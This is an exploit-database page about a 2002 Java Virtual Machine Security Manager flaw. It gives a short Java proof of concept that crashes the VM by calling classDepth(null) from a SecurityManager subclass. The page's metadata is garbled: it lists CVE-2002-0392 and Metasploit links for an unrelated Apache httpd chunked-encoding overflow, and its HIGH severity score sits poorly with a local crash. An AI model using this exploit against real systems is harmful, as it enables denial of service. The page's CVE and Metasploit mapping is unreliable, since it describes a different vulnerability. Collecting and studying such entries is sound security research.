header-logo
Suggest Exploit
vendor:
Java Virtual Machine
by:
Marc Schoenefeld
8.5
CVSS
HIGH
Java Virtual Machine Security Manager Vulnerability
20
CWE
Product Name: Java Virtual Machine
Affected Version From: Java Virtual Machine 1.3.1
Affected Version To: Java Virtual Machine 1.4.1
Patch Exists: YES
Related CWE: CVE-2002-0392
CPE: o:sun:java_virtual_machine
Metasploit: https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2002-0392/https://www.rapid7.com/db/vulnerabilities/http-apache2-chunked-transfer-int-bof/https://www.rapid7.com/db/vulnerabilities/apache-httpd-1_3_x-apache-chunked-encoding-vulnerability-cve-2002-0392/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2002

Java Virtual Machine Security Manager Vulnerability

A vulnerability exists in the Sun Microsystems Java Virtual Machine when implementing the Security Manager. An attacker can exploit this vulnerability to crash the virtual machine by creating a class that extends the SecurityManager class and calling the classDepth() method with a null argument.

Mitigation:

Sun has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8892/info

A problem has been reported in the Sun Microsystems Java Virtual Machine that occurs when implementing the Security Manager. Because of this, an attacker may be able to crash the virtual machine. 

/* InsecurityManager-Demonstration */
/* coded by Marc Schoenefeld */
public class InSecurityManager extends SecurityManager {

public void doit() {
System.out.println("doit");
int o = classDepth(null);
}

public static void main(String[] a) {
InSecurityManager m = new InSecurityManager();
m.doit();
}
}

Navigation

Suggest Exploit

Services By CQR